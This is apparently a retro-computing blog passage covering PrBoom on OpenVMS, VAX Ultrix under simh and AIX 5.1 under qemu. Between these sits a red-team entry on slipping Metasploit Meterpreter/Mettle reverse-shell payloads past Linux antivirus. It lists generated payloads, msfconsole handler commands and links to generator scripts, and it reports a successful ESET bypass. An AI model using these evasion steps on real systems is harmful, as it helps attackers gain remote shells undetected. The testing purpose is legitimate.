checking version libSDL  : 1.2.14
Checking for correct libSDL  ...   Yes
generating LIBSDL_MIXER$SHR.OPT
generating LIBSDL_MIXER.OPT
generating LIBSDL_MIXER$DEF.OPT
 
 
Now you can type @BUILD 
$ @build.com

<---- CUT   AFTER SOME TIME  CUT -----> 
***************************************************************************** 
LIBSDL_MIXER$STARTUP.COM has been created. 
This file setups all logicals needed. It should be execute before using 
Nice place to call it - LOGIN.COM 
***************************************************************************** 
Important! You are using shared library of libSDL. To compile a project with lib
SDL_MIXER you should: 
CC/INCL=(SDL,LIBSDL_MIXER) PROJECT.C
LINK/THREAD=UP  PROJECT,LIBSDL_MIXER:LIBSDL_MIXER$SHR/OPT,LIBSDL:LIBSDL$SHR/OPT

$ @LIBSDL_MIXER$STARTUP.COM 
%DCL-E-OPENIN, error opening SYS$SYSROOT:[SYSMGR.BUILD.SDL_MIXER-1_2_8B]LIBSDL_M
IXER$STARTUP.COM; as input
-RMS-E-FLK, file currently locked by another user

If we get the above message that the file is currently locked by another user, we just need to log in again and re-define all the symbols and logicals in the session (I welcome any suggestions on how to avoid this):

$ logout
SYSTEM logged out at 7-MAR-2019 23:55:10.78

Welcome to OpenVMS (TM) Alpha Operating System, Version V8.4

$ set def SYS$SYSROOT:[SYSMGR.BUILD.SDL-1_2_14]
$ @LIBSDL$STARTUP.COM
$ set def SYS$SYSROOT:[SYSMGR.BUILD.SDL_MIXER-1_2_8b]
$ @LIBSDL_MIXER$STARTUP.COM
$ set def SYS$SYSROOT:[SYSMGR.BUILD]              
$ vmstar :== $SYS$SYSROOT:[SYSMGR.BUILD]vmstar.exe
$ unzip :== $SYS$SYSROOT:[SYSMGR.BUILD]unzip.exe
$ mmk :== $SYS$SYSROOT:[SYSMGR.BUILD.MMK]mmk.exe

Step 4.Building PrBoom-2.5.0

Once we have finished building SDL-Mixer we can move on to compiling the PrBoom source! We are almost there. I have modified the configure.com OpenVMS patch for PrBoom so that it builds on my emulated OpenVMS 8.4 Alpha without the zlib and libpng libraries; the original patch from http://nchrem.tnw.tudelft.nl/openvms/software2.html required them, but they are not essential.

Let's first get the sources and the patches for PrBoom 2.5.0 here

http://45.76.81.249/OpenVMS/Alpha/prboom-2_5_0.tar

and the original and my customized VMS patches here

http://45.76.81.249/OpenVMS/Alpha/prboom-2_5_0_vmspatch.zip

http://45.76.81.249/OpenVMS/Alpha/CONFIGURE.COM   (IMPORTANT: use this CONFIGURE.COM!)

We upload them via FTP to SYS$SYSROOT:[SYSMGR.BUILD], extract and patch the source code, and as a final step replace the generated configure.com with the CONFIGURE.COM above in SYS$SYSROOT:[SYSMGR.BUILD.prboom-2_5_0]

$ set def SYS$SYSROOT:[SYSMGR.BUILD]
$ vmstar -xvf prboom-2_5_0.tar
$ unzip prboom-2_5_0_vmspatch.zip
Archive: SYS$SYSROOT:[SYSMGR.BUILD]prboom-2_5_0_vmspatch.zip;1
inflating: [.prboom-2_5_0]configure.com 
replace [.prboom-2_5_0.src]m_fixed.h? [y]es, [n]o, [A]ll, [N]one, [r]ename: A
$ copy CONFIGURE.COM SYS$SYSROOT:[SYSMGR.BUILD.prboom-2_5_0] 
$ set def SYS$SYSROOT:[SYSMGR.BUILD.prboom-2_5_0]
$ @CONFIGURE.COM;2 
 
Configuring PRBOOM
(c) Alexey Chupahin (aka CHAPG) 
 
Checking architecture   ...  Alpha
Checking OS             ...  OpenVMS V8.4    
Compiler		...  DEC C
Checking build utility	...  MMK
 
checking version libSDL  : 1.2.14
Checking for correct libSDL  ...   Yes
Checking for TCPIP ...   Yes
checking version LIBSDL_MIXER  : 1.2.8
Checking for correct LIBSDL_MIXER ...   Yes
Checking for vsnprintf ...   Yes
Generating CONFIG.H
Generating DESCRIP.MMS
Generating BUILD.COM 
 
 
Now you can type @BUILD 
$ set def SYS$SYSROOT:[SYSMGR.BUILD.PRBOOM-2_5_0]
$ @BUILD 

<--- CUT AFTER SOME TIME CUT ---> 

LINK/EXE=DOOM.EXE [.SDL]I_MAIN,[]DOOM/LIB,libsdl:libsdl$shr/opt,libsdl_mixer:lib
sdl_mixer/opt
%LINK-W-WRNERS, compilation warnings
in module i_main file SYS$SYSROOT:[SYSMGR.BUILD.prboom-2_5_0.src.SDL]I_M
AIN.OBJ;1
%LINK-W-WRNERS, compilation warnings
in module g_game file SYS$SYSROOT:[SYSMGR.BUILD.prboom-2_5_0.src]DOOM.OL
B;1
%LINK-W-WRNERS, compilation warnings
in module i_video file SYS$SYSROOT:[SYSMGR.BUILD.prboom-2_5_0.src]DOOM.O
LB;1
%LINK-W-WRNERS, compilation warnings
in module m_misc file SYS$SYSROOT:[SYSMGR.BUILD.prboom-2_5_0.src]DOOM.OL
B;1
%LINK-W-WRNERS, compilation warnings
in module v_video file SYS$SYSROOT:[SYSMGR.BUILD.prboom-2_5_0.src]DOOM.O
LB;1
%LINK-W-WRNERS, compilation warnings
in module w_mmap file SYS$SYSROOT:[SYSMGR.BUILD.prboom-2_5_0.src]DOOM.OL
B;1
$!
$ 

Make sure to copy prboom.wad into the directory holding DOOM.EXE, together with the DOOM.WAD of your choice.

Doom1.wad can be downloaded from here

http://45.76.81.249/OpenVMS/Alpha/DOOM.WAD

and the configuration file (which disables mouse movement) here

https://45.76.81.249/OpenVMS/Alpha/prboom.cfg

$ set def SYS$SYSROOT:[SYSMGR.BUILD.PRBOOM-2_5_0.data]
$ copy prboom.wad SYS$SYSROOT:[SYSMGR.BUILD.PRBOOM-2_5_0]
$ set def SYS$SYSROOT:[SYSMGR.BUILD.PRBOOM-2_5_0.src]
$ copy DOOM.EXE SYS$SYSROOT:[SYSMGR.BUILD.PRBOOM-2_5_0]
$ set def SYS$SYSROOT:[SYSMGR.BUILD.PRBOOM-2_5_0]

The following needs to be executed inside the DW-MOTIF X11 session:

$ doom :== $SYS$SYSROOT:[SYSMGR.BUILD.PRBOOM-2_5_0]doom.exe

That is it and now you can enjoy some Doom on the OpenVMS AXP ;)

Huge thanks go to the original Doom porter Alexey Chupahin (SDL, SDL-mixer, Prboom patches)

Also thanks go to joukj@hrem.nano.tudelft.nl for providing his sets of great OpenVMS patches for SDL and SDL-mixer as well as PrBoom http://nchrem.tnw.tudelft.nl/openvms/software2.html

 

Running VAX Ultrix 4.5 on simh


Not a long entry here, since all the hard work was already done by Darkstar @ http://gunkies.org/wiki/Installing_Ultrix_4.5_on_SIMH

I only wanted to add my additions (tun-tap networking and remote X11 DECwindows via Xephyr)

The main difference is the ultrix.ini configuration file, since we will be using tap0 with bridging and set up masquerading on our Linux machine. Below is my network.sh script, which I run before the simh simulator starts:

#!/bin/sh
# Setup tap and bridge
tunctl -t tap0 -u user          # create tap0 owned by the unprivileged user that runs simh
ifconfig tap0 up
brctl addbr br0
brctl setfd br0 0               # no forwarding delay on the new bridge
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up   # host side of the guest network
#brctl addif br0 tap0 vboxnet0 <-- add this if you wish to integrate with VirtualBox
brctl addif br0 tap0
ifconfig tap0 0.0.0.0           # the address lives on the bridge, not on tap0
sysctl net.ipv4.ip_forward=1    # let the host route between br0 and the uplink
# NAT everything the guest sends out via wlan0; the guest gets unrestricted outbound access
iptables --table nat -A POSTROUTING --out-interface wlan0 -j MASQUERADE

Next is the ultrix.ini simh configuration file that I have used

; SimH 4.0 Configuration file for MicroVAX 3800
;
; Host System : DEC MicroVAX 3800
; Operating System : DEC Ultrix v4.5
; Memory : 64mb
; Network config : XQ: Ethernet, 08:00:2b:04:14:02
; Disks : RQ0: RA90, 1.2gb
; RQ1: RA90, 1.2gb
; CDROMs : RQ2: iso file
; Tape config : TQ0: TK50, 94mb
;

load -r ka655x.bin

; NVRAM
attach NVR nvram.bin

; CPU config
set CPU 64m
set CPU conhalt
set CPU idle=all

; configure console to 7-bit only
set TTO 7b
set TTI 7b

; Disk drives
set RQ0 ra90
attach RQ0 disk01.dd 
set RQ1 ra90
attach RQ1 disk02.dd 
set RQ2 CDROM
attach -r RQ2 ultrix.iso
set RQ3 dis

; Tape
set TQ tk50
;attach tq0 filename-to-tape-file
set TQ1 dis
set TQ2 dis
set TQ3 dis

; Disable unused peripherals
set CR dis
set RL dis
set TS dis

; Attach Ethernet to a network interface
set xq mac=08-00-2B-AA-BB-CC
attach xq tap:tap0

; boot the system
boot CPU

Explanation:

The ka620.bin is from here  https://github.com/simh/simh/raw/master/VAX/ka620.bin

The ultrix.iso is from here: https://musall.de/mirrors/ultrix/ultrix_os/vax/ultrix-vax-4.5-mode1.ufs.bz2 ; just bunzip2 it and rename the result to ultrix.iso

The disk01.dd and disk02.dd images are created like this:

dd if=/dev/zero of=disk01.dd bs=1024 count=1M
dd if=/dev/zero of=disk02.dd bs=1024 count=1M

Installation

So one can pretty much follow the steps in http://gunkies.org/wiki/Installing_Ultrix_4.5_on_SIMH 100%, except in the following section, where I have chosen DECwindows for OSF/Motif (1)

I have used a slightly different network config because of the tap setup above, so we change this section accordingly.

I have used these values

# ifconfig qe0 10.0.2.12 netmask 255.255.255.0 up
# route add default 10.0.2.2 1

Once we reboot and have everything (including the network) working, we move on to configuring the DECwindows part. For this I have changed the following file, /usr/lib/X11/xdm/Xsession, so that it loads DECwindows Motif:

#!/bin/sh

# Send any errors from the session to a per-user log file
exec > $HOME/.xsession-errors 2>&1

# xdm passes "failsafe" as the single argument when the failsafe
# session is chosen; give the user a bare xterm in that case
case $# in
1)
	case $1 in
	failsafe)
		exec xterm -geometry 80x24-0-0
		;;
	esac
esac

startup=$HOME/.xsession
resources=$HOME/.Xresources

# Prefer a per-user ~/.xsession; otherwise load ~/.Xresources (if any)
# and start the DECwindows Motif session manager
if [ -f $startup ]; then
	exec $startup
else
	if [ -f $resources ]; then
		xrdb -load $resources
	fi
	exec /usr/bin/dxsession
fi

Then I have created a symlink to xdm so I could call startx from root directly

# ln -s /usr/bin/X11/xdm /startx

Then, whenever I want to run DECwindows, I just start it with

# ./startx

And on my Linux host I run Xephyr as follows

Xephyr -screen 980x640 -ac -query 10.0.2.12 :3

Which gives me a nice remote DECwindows environment to work with

There are some interesting VAX Ultrix resources still available online today, such as

https://musall.de/mirrors/ultrix/freeware/starfish.osfn.org/ultrix/ GCC 3.0.4 is there if you don’t like the DEC C compiler.

References:

http://gunkies.org/wiki/Installing_Ultrix_4.5_on_SIMH 
Stephen's Machine Room - https://www.youtube.com/watch?v=dwFnzGZBA6E
https://musall.de/mirrors/ultrix/freeware/

 

Metasploit payloads evasion against Linux AV


Well, there are not many Linux antivirus solutions out there, but of the few I think Avast, Eset and Kaspersky are among the best. The purpose of this article is not to promote one product over another, but rather to use them in a live test that could be part of a Red-Team exercise (if they ever go down this path, of course), to prepare against the antivirus software one may encounter and to know what will get flagged and what will pass (Metasploit/Meterpreter/Mettle).

So for the sake of this exercise I have created a simple shell script generator that will produce various encoded executable Linux payloads of interest, which we will upload to a Linux Virtual machine (Ubuntu 18.04 x86_64) and let the installed AV handle the findings. What would be left would be the pieces that would theoretically work and bypass the AV, so we will test a few examples to verify their functionality.

I have concentrated mainly on the Linux x86 and x86_64 Meterpreter/Mettle payloads with various encoder combinations. The shell script generator has variables that can be changed to any combination of one's liking, automating the generation of the binaries.

Make sure you place the script below in your metasploit-framework path and make it executable. The generator script resides here:

https://github.com/DoktorCranium/Linux-Meterpreter-tests/blob/master/Linux-meterpreter-tests/AV-TEST-LINUX.sh

When running the script you should enter the Metasploit-framework LISTENING IP address and TCP port, for example:

In our first test scenario, we will be using the Eset NOD32 4.0.90 on Ubuntu 18.04 (x86_64)

Next is the list of generated test payloads, which we feed to the remote machine running the Linux AV via scp. In our test we have generated 47 executables.

-rw-r--r-- 1 root root 1102368 Apr 23 23:44 aarch64-reverse_tcp2.elf
-rw-r--r-- 1 root root     332 Apr 23 23:43 aarch64-reverse_tcp.elf
-rw-r--r-- 1 root root 1030664 Apr 23 23:44 armle-reverse_tcp2.elf
-rw-r--r-- 1 root root     464 Apr 23 23:44 mipsbe-reverse_tcp.elf
-rw-r--r-- 1 root root     464 Apr 23 23:44 mipsle-reverse_tcp.elf
-rw-r--r-- 1 root root     162 Apr 23 23:39 x64-exec.elf
-rw-r--r-- 1 root root     162 Apr 23 23:39 x64-exec-xor.elf
-rw-r--r-- 1 root root     198 Apr 23 23:39 x64-mt-bind_tcp.elf
-rw-r--r-- 1 root root     239 Apr 23 23:39 x64-mt-bind_tcp-xor.elf
-rw-r--r-- 1 root root 1046472 Apr 23 23:39 x64-mt-reverse_tcp2.elf
-rw-r--r-- 1 root root     249 Apr 23 23:38 x64-mt-reverse_tcp.elf
-rw-r--r-- 1 root root 1046631 Apr 23 23:39 x64-mt-reverse_tcp-xor2.elf
-rw-r--r-- 1 root root     295 Apr 23 23:38 x64-mt-reverse_tcp-xor.elf
-rw-r--r-- 1 root root 1046472 Apr 23 23:39 x64-mt-rev-http.elf
-rw-r--r-- 1 root root 1046472 Apr 23 23:40 x64-mt-rev-https.elf
-rw-r--r-- 1 root root 1046631 Apr 23 23:39 x64-mt-rev-https-xor.elf
-rw-r--r-- 1 root root 1046631 Apr 23 23:39 x64-mt-rev-http-xor.elf
-rw-r--r-- 1 root root     206 Apr 23 23:40 x64-sh-bind_tcp2.elf
-rw-r--r-- 1 root root     198 Apr 23 23:40 x64-sh-bind_tcp.elf
-rw-r--r-- 1 root root     247 Apr 23 23:40 x64-sh-bind_tcp-xor2.elf
-rw-r--r-- 1 root root     239 Apr 23 23:40 x64-sh-bind_tcp-xor.elf
-rw-r--r-- 1 root root     249 Apr 23 23:40 x64-sh-reverse.elf
-rw-r--r-- 1 root root     194 Apr 23 23:40 x64-sh-reverse_tcp2.elf
-rw-r--r-- 1 root root     239 Apr 23 23:40 x64-sh-reverse_tcp-xor2.elf
-rw-r--r-- 1 root root     295 Apr 23 23:40 x64-sh-reverse-xor.elf
-rw-r--r-- 1 root root     122 Apr 23 23:41 x86-exec.elf
-rw-r--r-- 1 root root     257 Apr 23 23:41 x86-exec-xor.elf
-rw-r--r-- 1 root root     194 Apr 23 23:42 x86-mt-bind_tcp.elf
-rw-r--r-- 1 root root     329 Apr 23 23:41 x86-mt-bind_tcp-xor.elf
-rw-r--r-- 1 root root 1107556 Apr 23 23:41 x86-mt-reverse_tcp2.elf
-rw-r--r-- 1 root root     207 Apr 23 23:41 x86-mt-reverse_tcp.elf
-rw-r--r-- 1 root root 1107790 Apr 23 23:41 x86-mt-reverse_tcp-xor2.elf
-rw-r--r-- 1 root root     342 Apr 23 23:41 x86-mt-reverse_tcp-xor.elf
-rw-r--r-- 1 root root     614 Apr 23 23:43 x86-mt-reverse_tcp-xor.elf.multi
-rw-r--r-- 1 root root 1107556 Apr 23 23:42 x86-mt-rev-http.elf
-rw-r--r-- 1 root root 1107556 Apr 23 23:42 x86-mt-rev-https.elf
-rw-r--r-- 1 root root 1107790 Apr 23 23:42 x86-mt-rev-https-xor.elf
-rw-r--r-- 1 root root 1107790 Apr 23 23:42 x86-mt-rev-http-xor.elf
-rw-r--r-- 1 root root     162 Apr 23 23:43 x86-sh-bind_tcp2.elf
-rw-r--r-- 1 root root     194 Apr 23 23:43 x86-sh-bind_tcp.elf
-rw-r--r-- 1 root root     297 Apr 23 23:43 x86-sh-bind_tcp-xor2.elf
-rw-r--r-- 1 root root     329 Apr 23 23:42 x86-sh-bind_tcp-xor.elf
-rw-r--r-- 1 root root     207 Apr 23 23:43 x86-sh-reverse.elf
-rw-r--r-- 1 root root     152 Apr 23 23:43 x86-sh-reverse_tcp2.elf
-rw-r--r-- 1 root root     287 Apr 23 23:43 x86-sh-reverse_tcp-xor2.elf
-rw-r--r-- 1 root root     342 Apr 23 23:43 x86-sh-reverse-xor.elf

So once we have uploaded them, the AV kicks in and, of course, auto-removes most of them.

Once the process finishes we see that a few files are left intact. Of these some won't work, but some will, which we test next… we have 27 files left.

Out of these, lets see the x86_64 ones that would be of interest to us since the VM runs 64bit

-rw-r--r-- 1 user user 162 Apr 23 22:08 x64-exec-xor.elf
-rw-r--r-- 1 user user 162 Apr 23 22:08 x64-exec.elf
-rw-r--r-- 1 user user 198 Apr 23 22:08 x64-mt-bind_tcp.elf
-rw-r--r-- 1 user user 1046631 Apr 23 22:08 x64-mt-rev-http-xor.elf
-rw-r--r-- 1 user user 1046631 Apr 23 22:08 x64-mt-rev-https-xor.elf
-rw-r--r-- 1 user user 1046631 Apr 23 22:08 x64-mt-reverse_tcp-xor2.elf
-rw-r--r-- 1 user user 198 Apr 23 22:08 x64-sh-bind_tcp.elf

We will configure our test LISTENER (place the below script in the metasploit-framework directory and make executable)

https://github.com/DoktorCranium/Linux-Meterpreter-tests/blob/master/Linux-meterpreter-tests/LISTENER-LINUX-METTLE.sh

(And adjust it to the payload under test, i.e. change line 13 accordingly.)

echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST ' > run.listener.sh

We need to change linux/x64/meterpreter/reverse_tcp in the LISTENER to the corresponding payload if we are going to verify anything apart from meterpreter/reverse_tcp,

which in this case becomes

echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter_reverse_tcp; set LHOST ' > run.listener.sh

The above will work with x64-mt-reverse_tcp-xor2.elf, since the platform is x64 and it is a meterpreter reverse TCP payload, so we fire up our listener (please note the difference between the above two payload names: the slash form meterpreter/reverse_tcp is staged, the underscore form meterpreter_reverse_tcp is stageless!)

And execute the payload on the testing VM with ESET NOD32 AV... and get a nice core-dumped message :)

So let's try other x86_64 ones with meterpreter/mettle; next to try is x64-mt-bind_tcp.elf

So we adjust the LISTENER again, this time with the linux/x64/meterpreter/bind_tcp payload. This time, however, we need to add a remote IP for the bind_tcp to work (which kinda sucks), but we will test nevertheless, and this time it works.

But we want to have a working reverse meterpreter/mettle payload that bypasses ESET NOD32!

So let's try some more custom code

https://github.com/DoktorCranium/Linux-Meterpreter-tests/blob/master/Linux-meterpreter-tests/LINUX-FORK-METTLE.sh

And upload the linux-payload to the VM with NOD32 and run the listener

Execute the linux-payload and ... success, we have bypassed the AV with a custom reverse mettle payload :)

Did I mention that you can do the same for Windows PE32? No? :) Well, now you know: it works just the same on Windows, and can be fully automated for AV evasion testing via the above scripts, scp, etc.

Running AIX 5.1 on qemu-system-ppc


A shorter entry here, which mostly follows Artyem Trasenko's blog: https://tyom.blogspot.com/2019/04/aixprep-under-qemu-how-to.html

If you have never installed AIX before, this howto will help you get going:

Installing AIX on Qemu!

A small note on the networking – I have used the following values

en0        10.0.2.12  
gateway    10.0.2.2   
nameserver 8.8.8.8

I will just add my own bits and pieces, the parts I have done on top of that guide. This guide also works for AIX 4.4.3, but not for anything newer than 5.1.

One can get the AIX 5.1 installation media (ISOs) from the WinWorld archive here https://winworldpc.com/product/aix/51

You will probably only want CD1, CD2 and CD3:

IBM AIX 5.1-3 (LCD4_1061_06) (ISO) [PPC] Volume 1 5.1-3 (LCD4_1061_06) English ppc CD 358.71MB
IBM AIX 5.1-3 (LCD4_1061_06) (ISO) [PPC] Volume 2 5.1-3 (LCD4_1061_06) English ppc CD 170.86MB
IBM AIX 5.1-3 (LCD4_1061_06) (ISO) [PPC] Volume 3 5.1-3 (LCD4_1061_06) English ppc CD 303MB

So once you have everything in place, you can use the following scripts to get networking working:

#Setup tap and bridge 
tunctl -t tap0 -u user
ifconfig tap0 up
brctl addbr br0
brctl setfd br0 0
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
brctl addif br0 tap0 
ifconfig tap0 0.0.0.0
sysctl net.ipv4.ip_forward=1
iptables --table nat -A POSTROUTING --out-interface wlan0 -j MASQUERADE

And this slightly modified /etc/qemu-ifup (place it in /etc/qemu-ifup):

#! /bin/sh
# Script to bring a network (tap) device for qemu up.
# The idea is to add the tap device to the same bridge
# as we have default routing to.

# in order to be able to find brctl
PATH=$PATH:/sbin:/usr/sbin
ip=$(which ip)

if [ -n "$ip" ]; then
    ip link set "$1" up
else
    brctl=$(which brctl)
    if [ ! "$ip" -o ! "$brctl" ]; then
        echo "W: $0: not doing any bridge processing: neither ip nor brctl utility found" >&2
        exit 0
    fi
    ifconfig "$1" 0.0.0.0 up
fi

switch=$(ip route ls |
    awk '/^default / {
        for(i=0;i<NF;i++) { if ($i == "dev") { print $(i+1); next; } }
    }'
)

# always use the br0 bridge created by the tap/bridge setup script
switch=br0

# only add the interface to default-route bridge if we
# have such interface (with default route) and if that
# interface is actually a bridge.
# It is possible to have several default routes too
for br in $switch; do
    if [ -d /sys/class/net/$br/bridge/. ]; then
        if [ -n "$ip" ]; then
            ip link set "$1" master "$br"
        else
            brctl addif $br "$1"
        fi
        exit # exit with status of the previous command
    fi
done

echo "W: $0: no bridge for guest interface found" >&2

Here is my loader script to make things easier

./qemu-system-ppc -m 192 -M 40p -bios q40pofw-serial.rom -serial telnet::4441,server -hda aix-hdd.qcow2 -cdrom ./cd.iso -net nic -net tap -vga none -nographic

So once we have AIX 5.1 installed we can start setting it up a little. I will include only the short work-log notes I made during my experimentation (which is still ongoing), so I will probably add more as time goes by. I assume you have at least basic knowledge of some sort of UNIX environment.

You will need a good deal of additional software installed (I have used Michael Perzl's legendary AIX Open Source Packages repo) from here -> http://www.perzl.org/aix/

To save some time I have collected all the needed RPMs (you will love the RPM dependency hell on these legacy UNIX systems, trust me) in my repository, which can be downloaded from here: http://45.76.81.249/AIX/aix-5.1/RPMs/ You should install all the RPMs from there. To transfer these packages to the emulated AIX 5.1 you can use ftp, for example.

# rpm -Uvh name-of-package.rpm

To get a nice remote X11 desktop I use Xephyr (this will only work if your network is configured and works)

On AIX run 
# /usr/X11/bin/xdm

On Linux 
$ Xephyr -screen 980x640 -ac -query 10.0.2.12 :3

Compiling OpenSSH on AIX 5.1

Since AIX 5.1 has no kernel support for PRNG pseudo-devices (there is no /dev/random or /dev/urandom), in order to compile OpenSSH we first need to download and build prngd.

You can download it from my repo here http://45.76.81.249/AIX/aix-5.1/prngd-0.9.29.tar or get it from the Sourceforge project page https://sourceforge.net/projects/prngd/files/prngd/0.9.29/

ON AIX
Unpack the sources e.g.:

# gunzip -c prngd-0.9.29.tar.gz | tar xvf -
# cd prngd-0.9.29

Modify the Makefile according to the OS version (here it was enough to make cc point at gcc):

# ln -s /usr/bin/gcc /usr/bin/cc

then build it

# gmake clean
# gmake

Install into some convenient directory, e.g.:

# cp contrib/AIX-4.3/prngd.conf.aix43 /etc/prngd.conf # entropy gathering commands
# cp in/prngd /usr/sbin/prngd

Configure it next and create a subsystem (the seed file only bootstraps the pool; the entropy itself comes from the commands listed in prngd.conf):

# cat /var/adm/wtmp > /etc/prngd-seed # random seed
# mkssys -s prngd -p /usr/sbin/prngd -a '-f -c /etc/prngd.conf -s /etc/prngd-seed /dev/egd-pool' -u 0 -S -n 15 -f 9 -R -G local
# startsrc -s prngd

Add to /etc/rc.local:

startsrc -s prngd # start the subsystem on boot

Next we can download/compile OpenSSH; the latest version that builds and works well is 6.9p1:

https://openbsd.mirror.netelligent.ca/pub/OpenBSD/OpenSSH/portable/

OpenSSH 3.5p1 –> builds fine and works

# ./configure --with-prngd-socket=/dev/egd-pool
# gmake
# mkuser -m sshd
# gmake install

OpenSSH 4.9p1 — OK
OpenSSH 5.9p1 — OK
OpenSSH 6.9p1 — OK

# ./configure --with-prngd-socket=/dev/egd-pool
# gmake
# mkuser -m sshd
# gmake install
0509-150 Dependent module libcrypto.a(libcrypto.so.1.0.2) could not be loaded.
# ln -s /opt/freeware/lib/libcrypto.a /usr/lib
# gmake install

Next I have added some hints that might help one get further.

To get the libm.a math libraries installed, mount CD1 of AIX 5.1, upload bos.adt from CD1/installp/ppc/bos.adt to the virtual AIX 5.1 and install it:

# installp -acF -d . bos.adt

Additionally one can install more, such as the IBM C compilers and X11.motif, X11.adt, etc.:

# installp -acF -d . X11.adt 
# installp -acF -d . X11.motif

You can then do many things ... one of the experiments was compiling Prboom.

You can try the binaries here http://45.76.81.249/AIX/aix-5.1/doom.tar

Latest Elinks 0.13 http://elinks.or.cz/download/elinks-current-0.13.tar.gz 

You can download the compiled RISC System/6000 binary+source here (just untar and gmake install): http://45.76.81.249/AIX/aix-5.1/elinks-0.13-20190426.tar

Latest stable PKGSRC Q1-2019 fails to bootstrap with the following error

To install CDE and run it instead of the boring mwm, get the following packages from CD1.

A nice command to list the most recently installed AIX filesets via installp (from https://www.ibm.com/developerworks/community/blogs/brian/entry/how_to_show_most_recently_installed_filesets_on_aix?lang=en):

lslpp -qch | awk -F: '{printf "%-14s %-40s %-15s\n",$7,$2,$3}' |
sort | uniq | sed 's/70/-70/' | sort -t '/' -k 3,3n -k 1,1n -k 2,2n |
sed 's/-70/70/'
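
As an added example (not IBM's one-liner and not from this blog), the same fileset inventory as a shell function: it reads lslpp -qch records from stdin, takes the install date from field 7 and fileset/level from fields 2 and 3 (the same fields the one-liner above prints), and rewrites MM/DD/YY to YYYY-MM-DD so that a plain sort is chronological without the sed juggling. The 70 pivot for two-digit years and the sample records are assumptions I constructed; this is handy after an install session like the one above to see exactly which filesets and levels landed.

```shell
#!/bin/sh
# Most recently installed AIX filesets from "lslpp -qch" output, added here as
# an example (not IBM's or the blog's command). The colon-separated history
# record is Path:Fileset:Level:PTF Id:Action:Status:Date:Time, so the install
# date (MM/DD/YY) is field 7 and fileset/level are fields 2 and 3.
# Two-digit years are pivoted at 70 (assumption: 70-99 = 19xx, 00-69 = 20xx).

# lslpp_recent [N]: read lslpp -qch lines on stdin, print the N newest
# (default 10) as "YYYY-MM-DD fileset level", newest first, duplicates
# (APPLY and COMMIT of the same level on the same day) collapsed
lslpp_recent() {
    n="${1:-10}"
    awk -F: 'NF >= 7 && $7 ~ /^[0-9][0-9]\/[0-9][0-9]\/[0-9][0-9]$/ {
        split($7, d, "/")
        yy = d[3] + 0
        year = (yy >= 70) ? 1900 + yy : 2000 + yy
        printf "%04d-%02d-%02d %-40s %s\n", year, d[1], d[2], $2, $3
    }' | sort -r -u | head -n "$n"
}

# Constructed sample of lslpp -qch output (not real output from the page's
# system); the header line is what lslpp prints without -q
LSLPP_SAMPLE='#Path:Fileset:Level:PTF Id:Action:Status:Date:Time
/usr/lib/objrepos:X11.Dt.rte:5.1.0.50::COMMIT:COMPLETE:05/05/19:12:10:00
/usr/lib/objrepos:X11.Dt.rte:5.1.0.50::APPLY:COMPLETE:05/05/19:12:09:30
/usr/lib/objrepos:OpenGL.GL32.rte.base:5.1.0.0::COMMIT:COMPLETE:05/03/19:09:00:00
/usr/lib/objrepos:bos.rte:5.1.0.0::COMMIT:COMPLETE:12/31/99:23:59:00'

# lslpp_demo [N]: run lslpp_recent over the constructed sample
lslpp_demo() { printf '%s\n' "$LSLPP_SAMPLE" | lslpp_recent "${1:-10}"; }
```

On the real system you would pipe the live command in, e.g. `lslpp -qch | lslpp_recent 20`; the sample and demo function only exist so the block runs offline.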

Here are the Dt relevant ones one needs

05/03/19 OpenGL.GL32.adt.demos 5.1.0.0 
05/03/19 OpenGL.GL32.adt.include 5.1.0.0 
05/03/19 OpenGL.GL32.adt.samples 5.1.0.0 
05/03/19 OpenGL.GL32.rte.base 5.1.0.0 
05/03/19 OpenGL.OpenGL_X.adt.include 5.1.0.25 
05/03/19 OpenGL.OpenGL_X.adt.samples 5.1.0.35 
05/03/19 OpenGL.OpenGL_X.dev.vfb 5.1.0.50 
05/03/19 OpenGL.OpenGL_X.rte.base 5.1.0.50 
05/03/19 OpenGL.OpenGL_X.rte.base+ 5.1.0.10 
05/03/19 OpenGL.OpenGL_X.rte.base_mp 5.1.0.10 
05/03/19 OpenGL.OpenGL_X.rte.pipe++ 5.1.0.35 
05/03/19 OpenGL.OpenGL_X.rte.pipe64++ 5.1.0.35 
05/03/19 OpenGL.OpenGL_X.rte.soft 5.1.0.50 
05/03/19 OpenGL.OpenGL_X.tools.base 5.1.0.0 
05/03/19 X11.adt.bitmaps 5.1.0.0 
05/03/19 X11.adt.ext 5.1.0.25 
05/03/19 X11.adt.imake 5.1.0.15 
05/03/19 X11.adt.include 5.1.0.0 
05/03/19 X11.adt.lib 5.1.0.0 
05/03/19 X11.adt.motif 5.1.0.0 
05/03/19 X11.vfb 5.1.0.15 
05/05/19 X11.Dt.ToolTalk 5.1.0.50 
05/05/19 X11.Dt.bitmaps 5.1.0.0 
05/05/19 X11.Dt.helpinfo 5.1.0.0 
05/05/19 X11.Dt.helpmin 5.1.0.0 
05/05/19 X11.Dt.helprun 5.1.0.0 
05/05/19 X11.Dt.lib 5.1.0.50 
05/05/19 X11.Dt.rte 5.1.0.50 
05/05/19 X11.apps.aixterm 5.1.0.35 
05/05/19 X11.apps.clients 5.1.0.0 
05/05/19 X11.apps.config 5.1.0.0 
05/05/19 X11.apps.custom 5.1.0.0 
05/05/19 X11.apps.msmit 5.1.0.50 
05/05/19 X11.apps.pm 5.1.0.0 
05/05/19 X11.apps.rte 5.1.0.0 
05/05/19 X11.apps.util 5.1.0.0 
05/05/19 X11.apps.xdm 5.1.0.25 
05/05/19 X11.apps.xterm 5.1.0.10 
05/05/19 X11.base.common 5.1.0.0 
05/05/19 X11.base.lib 5.1.0.50 
05/05/19 X11.base.rte 5.1.0.50 
05/05/19 X11.base.smt 5.1.0.25 
05/05/19 X11.fnt.Gr_Cyr_T1 5.1.0.0 
05/05/19 X11.fnt.coreX 5.1.0.0 
05/05/19 X11.fnt.defaultFonts 5.1.0.0 
05/05/19 X11.fnt.ibm1046 5.1.0.0 
05/05/19 X11.fnt.ibm1046_T1 5.1.0.0 
05/05/19 X11.fnt.iso1 5.1.0.25 
05/05/19 X11.fnt.iso2 5.1.0.0 
05/05/19 X11.fnt.iso3 5.1.0.0 
05/05/19 X11.fnt.iso4 5.1.0.0 
